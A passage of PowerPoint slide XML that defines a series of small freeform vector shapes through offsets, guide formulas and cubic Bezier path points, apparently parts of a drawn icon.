                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="439"/>
                      <a:pt x="40" y="450"/>
                      <a:pt x="26" y="4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135" name="Freeform 774">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52EDD687-C74C-B549-A65B-BB38498711A5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1639805" y="5646542"/>
                <a:ext cx="43747" cy="42796"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 185"/>
                  <a:gd name="T1" fmla="*/ 183 h 183"/>
                  <a:gd name="T2" fmla="*/ 10 w 185"/>
                  <a:gd name="T3" fmla="*/ 175 h 183"/>
                  <a:gd name="T4" fmla="*/ 10 w 185"/>
                  <a:gd name="T5" fmla="*/ 139 h 183"/>
                  <a:gd name="T6" fmla="*/ 139 w 185"/>
                  <a:gd name="T7" fmla="*/ 10 h 183"/>
                  <a:gd name="T8" fmla="*/ 175 w 185"/>
                  <a:gd name="T9" fmla="*/ 10 h 183"/>
                  <a:gd name="T10" fmla="*/ 175 w 185"/>
                  <a:gd name="T11" fmla="*/ 47 h 183"/>
                  <a:gd name="T12" fmla="*/ 47 w 185"/>
                  <a:gd name="T13" fmla="*/ 175 h 183"/>
                  <a:gd name="T14" fmla="*/ 28 w 185"/>
                  <a:gd name="T15" fmla="*/ 183 h 1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 h="183">
                    <a:moveTo>
                      <a:pt x="28" y="183"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="183"/>
                      <a:pt x="15" y="180"/>
                      <a:pt x="10" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="165"/>
                      <a:pt x="0" y="149"/>
                      <a:pt x="10" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="10"/>
                      <a:pt x="139" y="10"/>
                      <a:pt x="139" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="149" y="0"/>
                      <a:pt x="165" y="0"/>
                      <a:pt x="175" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="185" y="20"/>
                      <a:pt x="185" y="37"/>
                      <a:pt x="175" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="175"/>
                      <a:pt x="47" y="175"/>
                      <a:pt x="47" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="180"/>
                      <a:pt x="35" y="183"/>
                      <a:pt x="28"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136" name="Freeform 775">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCB4AA54-9978-7A45-9165-312B98F3437C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1701620" y="5781586"/>
                <a:ext cx="56110" cy="12364"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 210 w 236"/>
                  <a:gd name="T1" fmla="*/ 51 h 51"/>
                  <a:gd name="T2" fmla="*/ 26 w 236"/>
                  <a:gd name="T3" fmla="*/ 51 h 51"/>
                  <a:gd name="T4" fmla="*/ 0 w 236"/>
                  <a:gd name="T5" fmla="*/ 26 h 51"/>
                  <a:gd name="T6" fmla="*/ 26 w 236"/>
                  <a:gd name="T7" fmla="*/ 0 h 51"/>
                  <a:gd name="T8" fmla="*/ 210 w 236"/>
                  <a:gd name="T9" fmla="*/ 0 h 51"/>
                  <a:gd name="T10" fmla="*/ 236 w 236"/>
                  <a:gd name="T11" fmla="*/ 26 h 51"/>
                  <a:gd name="T12" fmla="*/ 210 w 236"/>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236" h="51">
                    <a:moveTo>
                      <a:pt x="210" y="51"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="51"/>
                      <a:pt x="26" y="51"/>
                      <a:pt x="26" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="51"/>
                      <a:pt x="0" y="40"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="11"/>
                      <a:pt x="12" y="0"/>
                      <a:pt x="26" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="210" y="0"/>
                      <a:pt x="210" y="0"/>
                      <a:pt x="210" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="224" y="0"/>
                      <a:pt x="236" y="11"/>
                      <a:pt x="236" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="236" y="40"/>
                      <a:pt x="224" y="51"/>
                      <a:pt x="210"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137" name="Freeform 776">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28B808CD-4DD9-0C4F-B376-E1052BE9AB55}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1771996" y="5646542"/>
                <a:ext cx="43747" cy="42796"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 157 w 185"/>
                  <a:gd name="T1" fmla="*/ 183 h 183"/>
                  <a:gd name="T2" fmla="*/ 138 w 185"/>
                  <a:gd name="T3" fmla="*/ 175 h 183"/>
                  <a:gd name="T4" fmla="*/ 10 w 185"/>
                  <a:gd name="T5" fmla="*/ 47 h 183"/>
                  <a:gd name="T6" fmla="*/ 10 w 185"/>
                  <a:gd name="T7" fmla="*/ 10 h 183"/>
                  <a:gd name="T8" fmla="*/ 46 w 185"/>
                  <a:gd name="T9" fmla="*/ 10 h 183"/>
                  <a:gd name="T10" fmla="*/ 175 w 185"/>
                  <a:gd name="T11" fmla="*/ 139 h 183"/>
                  <a:gd name="T12" fmla="*/ 175 w 185"/>
                  <a:gd name="T13" fmla="*/ 175 h 183"/>
                  <a:gd name="T14" fmla="*/ 157 w 185"/>
                  <a:gd name="T15" fmla="*/ 183 h 1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5" h="183">
                    <a:moveTo>
                      <a:pt x="157" y="183"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="183"/>
                      <a:pt x="143" y="180"/>
                      <a:pt x="138" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="47"/>
                      <a:pt x="10" y="47"/>
                      <a:pt x="10" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="37"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="10" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="0"/>
                      <a:pt x="36" y="0"/>
                      <a:pt x="46" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="175" y="139"/>
                      <a:pt x="175" y="139"/>
                      <a:pt x="175" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="185" y="149"/>
                      <a:pt x="185" y="165"/>
                      <a:pt x="175" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="180"/>
                      <a:pt x="163" y="183"/>
                      <a:pt x="157"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138" name="Freeform 777">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF212D0-A021-1942-B913-A29FDDC0F2E7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1781506" y="5737839"/>
                <a:ext cx="12364" cy="39943"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 52"/>
                  <a:gd name="T1" fmla="*/ 169 h 169"/>
                  <a:gd name="T2" fmla="*/ 1 w 52"/>
                  <a:gd name="T3" fmla="*/ 143 h 169"/>
                  <a:gd name="T4" fmla="*/ 0 w 52"/>
                  <a:gd name="T5" fmla="*/ 26 h 169"/>
                  <a:gd name="T6" fmla="*/ 26 w 52"/>
                  <a:gd name="T7" fmla="*/ 0 h 169"/>
                  <a:gd name="T8" fmla="*/ 26 w 52"/>
                  <a:gd name="T9" fmla="*/ 0 h 169"/>
                  <a:gd name="T10" fmla="*/ 52 w 52"/>
                  <a:gd name="T11" fmla="*/ 26 h 169"/>
                  <a:gd name="T12" fmla="*/ 52 w 52"/>
                  <a:gd name="T13" fmla="*/ 143 h 169"/>
                  <a:gd name="T14" fmla="*/ 27 w 52"/>
                  <a:gd name="T15" fmla="*/ 169 h 169"/>
                  <a:gd name="T16" fmla="*/ 26 w 52"/>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169">
                    <a:moveTo>
                      <a:pt x="26" y="169"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="169"/>
                      <a:pt x="1" y="158"/>
                      <a:pt x="1" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="26"/>
                      <a:pt x="0" y="26"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="12"/>
                      <a:pt x="12" y="0"/>
                      <a:pt x="26" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="26" y="0"/>
                      <a:pt x="26" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="0"/>
                      <a:pt x="52" y="11"/>
                      <a:pt x="52" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="143"/>
                      <a:pt x="52" y="143"/>
                      <a:pt x="52" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="158"/>
                      <a:pt x="41" y="169"/>
                      <a:pt x="27" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="169"/>
                      <a:pt x="26" y="169"/>
                      <a:pt x="26"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139" name="Freeform 778">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F4989E8-23BF-B849-8E96-958220861902}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1830008" y="5696945"/>
                <a:ext cx="36139" cy="23776"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 155"/>
                  <a:gd name="T1" fmla="*/ 100 h 100"/>
                  <a:gd name="T2" fmla="*/ 6 w 155"/>
                  <a:gd name="T3" fmla="*/ 86 h 100"/>
                  <a:gd name="T4" fmla="*/ 18 w 155"/>
                  <a:gd name="T5" fmla="*/ 51 h 100"/>
                  <a:gd name="T6" fmla="*/ 114 w 155"/>
                  <a:gd name="T7" fmla="*/ 6 h 100"/>
                  <a:gd name="T8" fmla="*/ 149 w 155"/>
                  <a:gd name="T9" fmla="*/ 18 h 100"/>
                  <a:gd name="T10" fmla="*/ 137 w 155"/>
                  <a:gd name="T11" fmla="*/ 52 h 100"/>
                  <a:gd name="T12" fmla="*/ 40 w 155"/>
                  <a:gd name="T13" fmla="*/ 98 h 100"/>
                  <a:gd name="T14" fmla="*/ 29 w 155"/>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100">
                    <a:moveTo>
                      <a:pt x="29" y="100"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="100"/>
                      <a:pt x="10" y="95"/>
                      <a:pt x="6" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="73"/>
                      <a:pt x="5" y="57"/>
                      <a:pt x="18" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="6"/>
                      <a:pt x="114" y="6"/>
                      <a:pt x="114" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="0"/>
                      <a:pt x="143" y="5"/>
                      <a:pt x="149" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="31"/>
                      <a:pt x="149" y="46"/>
                      <a:pt x="137" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="98"/>
                      <a:pt x="40" y="98"/>
                      <a:pt x="40" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="100"/>
                      <a:pt x="33" y="100"/>
                      <a:pt x="2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140" name="Freeform 779">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60F08C38-B143-DD46-8B18-978FBA639ADE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1852832" y="5776831"/>
                <a:ext cx="12364" cy="33286"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 52"/>
                  <a:gd name="T1" fmla="*/ 140 h 140"/>
                  <a:gd name="T2" fmla="*/ 0 w 52"/>
                  <a:gd name="T3" fmla="*/ 114 h 140"/>
                  <a:gd name="T4" fmla="*/ 0 w 52"/>
                  <a:gd name="T5" fmla="*/ 25 h 140"/>
                  <a:gd name="T6" fmla="*/ 26 w 52"/>
                  <a:gd name="T7" fmla="*/ 0 h 140"/>
                  <a:gd name="T8" fmla="*/ 52 w 52"/>
                  <a:gd name="T9" fmla="*/ 25 h 140"/>
                  <a:gd name="T10" fmla="*/ 52 w 52"/>
                  <a:gd name="T11" fmla="*/ 114 h 140"/>
                  <a:gd name="T12" fmla="*/ 26 w 52"/>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52" h="140">
                    <a:moveTo>
                      <a:pt x="26" y="140"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="140"/>
                      <a:pt x="0" y="128"/>
                      <a:pt x="0" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="25"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="0" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="11"/>
                      <a:pt x="12" y="0"/>
                      <a:pt x="26" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="0"/>
                      <a:pt x="52" y="11"/>
                      <a:pt x="52" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="114"/>
                      <a:pt x="52" y="114"/>
                      <a:pt x="52" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="128"/>
                      <a:pt x="40" y="140"/>
                      <a:pt x="26"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141" name="Freeform 780">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{596295BC-96A8-CA4A-9D16-7CAC358EBF8B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1904187" y="5719770"/>
                <a:ext cx="35188" cy="35188"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 40 w 150"/>
                  <a:gd name="T1" fmla="*/ 146 h 146"/>
                  <a:gd name="T2" fmla="*/ 17 w 150"/>
                  <a:gd name="T3" fmla="*/ 133 h 146"/>
                  <a:gd name="T4" fmla="*/ 28 w 150"/>
                  <a:gd name="T5" fmla="*/ 98 h 146"/>
                  <a:gd name="T6" fmla="*/ 66 w 150"/>
                  <a:gd name="T7" fmla="*/ 76 h 146"/>
                  <a:gd name="T8" fmla="*/ 18 w 150"/>
                  <a:gd name="T9" fmla="*/ 53 h 146"/>
                  <a:gd name="T10" fmla="*/ 6 w 150"/>
                  <a:gd name="T11" fmla="*/ 19 h 146"/>
                  <a:gd name="T12" fmla="*/ 40 w 150"/>
                  <a:gd name="T13" fmla="*/ 7 h 146"/>
                  <a:gd name="T14" fmla="*/ 135 w 150"/>
                  <a:gd name="T15" fmla="*/ 51 h 146"/>
                  <a:gd name="T16" fmla="*/ 149 w 150"/>
                  <a:gd name="T17" fmla="*/ 74 h 146"/>
                  <a:gd name="T18" fmla="*/ 136 w 150"/>
                  <a:gd name="T19" fmla="*/ 98 h 146"/>
                  <a:gd name="T20" fmla="*/ 52 w 150"/>
                  <a:gd name="T21" fmla="*/ 143 h 146"/>
                  <a:gd name="T22" fmla="*/ 40 w 150"/>
                  <a:gd name="T23"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0" h="146">
                    <a:moveTo>
                      <a:pt x="40" y="146"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="146"/>
                      <a:pt x="22" y="141"/>
                      <a:pt x="17" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="120"/>
                      <a:pt x="15" y="105"/>
                      <a:pt x="28" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="76"/>
                      <a:pt x="66" y="76"/>
                      <a:pt x="66" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="53"/>
                      <a:pt x="18" y="53"/>
                      <a:pt x="18" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="47"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="6" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="6"/>
                      <a:pt x="27" y="0"/>
                      <a:pt x="40" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="135" y="51"/>
                      <a:pt x="135" y="51"/>
                      <a:pt x="135" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="56"/>
                      <a:pt x="149" y="64"/>
                      <a:pt x="149" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="84"/>
                      <a:pt x="144" y="93"/>
                      <a:pt x="136" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="143"/>
                      <a:pt x="52" y="143"/>
                      <a:pt x="52" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="145"/>
                      <a:pt x="44" y="146"/>
                      <a:pt x="40"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142" name="Freeform 781">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{413163FE-DD84-784B-AC8C-F9584C4DB1BB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1912746" y="5800606"/>
                <a:ext cx="27580" cy="42796"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 117"/>
                  <a:gd name="T1" fmla="*/ 183 h 183"/>
                  <a:gd name="T2" fmla="*/ 7 w 117"/>
                  <a:gd name="T3" fmla="*/ 171 h 183"/>
                  <a:gd name="T4" fmla="*/ 15 w 117"/>
                  <a:gd name="T5" fmla="*/ 135 h 183"/>
                  <a:gd name="T6" fmla="*/ 66 w 117"/>
                  <a:gd name="T7" fmla="*/ 103 h 183"/>
                  <a:gd name="T8" fmla="*/ 66 w 117"/>
                  <a:gd name="T9" fmla="*/ 25 h 183"/>
                  <a:gd name="T10" fmla="*/ 91 w 117"/>
                  <a:gd name="T11" fmla="*/ 0 h 183"/>
                  <a:gd name="T12" fmla="*/ 117 w 117"/>
                  <a:gd name="T13" fmla="*/ 25 h 183"/>
                  <a:gd name="T14" fmla="*/ 117 w 117"/>
                  <a:gd name="T15" fmla="*/ 117 h 183"/>
                  <a:gd name="T16" fmla="*/ 106 w 117"/>
                  <a:gd name="T17" fmla="*/ 138 h 183"/>
                  <a:gd name="T18" fmla="*/ 43 w 117"/>
                  <a:gd name="T19" fmla="*/ 179 h 183"/>
                  <a:gd name="T20" fmla="*/ 29 w 117"/>
                  <a:gd name="T21"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183">
                    <a:moveTo>
                      <a:pt x="29" y="183"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="183"/>
                      <a:pt x="12" y="179"/>
                      <a:pt x="7" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="159"/>
                      <a:pt x="3" y="143"/>
                      <a:pt x="15" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="103"/>
                      <a:pt x="66" y="103"/>
                      <a:pt x="66" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="25"/>
                      <a:pt x="66" y="25"/>
                      <a:pt x="66" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="11"/>
                      <a:pt x="77" y="0"/>
                      <a:pt x="91" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="0"/>
                      <a:pt x="117" y="11"/>
                      <a:pt x="117" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="117"/>
                      <a:pt x="117" y="117"/>
                      <a:pt x="117" y="117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="125"/>
                      <a:pt x="113" y="134"/>
                      <a:pt x="106" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="179"/>
                      <a:pt x="43" y="179"/>
                      <a:pt x="43" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="182"/>
                      <a:pt x="34" y="183"/>
                      <a:pt x="29"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143" name="Freeform 782">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C06C837-EC50-6349-88ED-171C22EC3984}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1927962" y="5734986"/>
                <a:ext cx="12364" cy="41845"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 25 w 51"/>
                  <a:gd name="T1" fmla="*/ 178 h 178"/>
                  <a:gd name="T2" fmla="*/ 0 w 51"/>
                  <a:gd name="T3" fmla="*/ 152 h 178"/>
                  <a:gd name="T4" fmla="*/ 0 w 51"/>
                  <a:gd name="T5" fmla="*/ 26 h 178"/>
                  <a:gd name="T6" fmla="*/ 25 w 51"/>
                  <a:gd name="T7" fmla="*/ 0 h 178"/>
                  <a:gd name="T8" fmla="*/ 51 w 51"/>
                  <a:gd name="T9" fmla="*/ 26 h 178"/>
                  <a:gd name="T10" fmla="*/ 51 w 51"/>
                  <a:gd name="T11" fmla="*/ 152 h 178"/>
                  <a:gd name="T12" fmla="*/ 25 w 51"/>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51" h="178">
                    <a:moveTo>
                      <a:pt x="25" y="178"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="178"/>
                      <a:pt x="0" y="166"/>
                      <a:pt x="0" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="26"/>
                      <a:pt x="0" y="26"/>
                      <a:pt x="0" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="12"/>
                      <a:pt x="11" y="0"/>
                      <a:pt x="25" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="0"/>
                      <a:pt x="51" y="12"/>
                      <a:pt x="51" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="152"/>
                      <a:pt x="51" y="152"/>
                      <a:pt x="51" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="166"/>
                      <a:pt x="40" y="178"/>
                      <a:pt x="25" y="1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144" name="Freeform 783">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB67D342-DB2D-1C4B-AE96-3646A7162C52}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1854734" y="5696945"/>
                <a:ext cx="36139" cy="21874"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 121 w 150"/>
                  <a:gd name="T1" fmla="*/ 93 h 93"/>
                  <a:gd name="T2" fmla="*/ 111 w 150"/>
                  <a:gd name="T3" fmla="*/ 91 h 93"/>
                  <a:gd name="T4" fmla="*/ 19 w 150"/>
                  <a:gd name="T5" fmla="*/ 53 h 93"/>
                  <a:gd name="T6" fmla="*/ 6 w 150"/>
                  <a:gd name="T7" fmla="*/ 19 h 93"/>
                  <a:gd name="T8" fmla="*/ 39 w 150"/>
                  <a:gd name="T9" fmla="*/ 5 h 93"/>
                  <a:gd name="T10" fmla="*/ 131 w 150"/>
                  <a:gd name="T11" fmla="*/ 44 h 93"/>
                  <a:gd name="T12" fmla="*/ 145 w 150"/>
                  <a:gd name="T13" fmla="*/ 78 h 93"/>
                  <a:gd name="T14" fmla="*/ 121 w 150"/>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93">
                    <a:moveTo>
                      <a:pt x="121" y="93"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="93"/>
                      <a:pt x="114" y="93"/>
                      <a:pt x="111" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="53"/>
                      <a:pt x="19" y="53"/>
                      <a:pt x="19" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="47"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="6" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="6"/>
                      <a:pt x="26" y="0"/>
                      <a:pt x="39" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="44"/>
                      <a:pt x="131" y="44"/>
                      <a:pt x="131" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="49"/>
                      <a:pt x="150" y="64"/>
                      <a:pt x="145" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="87"/>
                      <a:pt x="131" y="93"/>
                      <a:pt x="121"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149" name="Freeform 784">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27DC0C8A-47E5-B847-B945-6EB9FFB8D503}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1782457" y="5722623"/>
                <a:ext cx="39943" cy="38992"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 139 w 168"/>
                  <a:gd name="T1" fmla="*/ 164 h 164"/>
                  <a:gd name="T2" fmla="*/ 127 w 168"/>
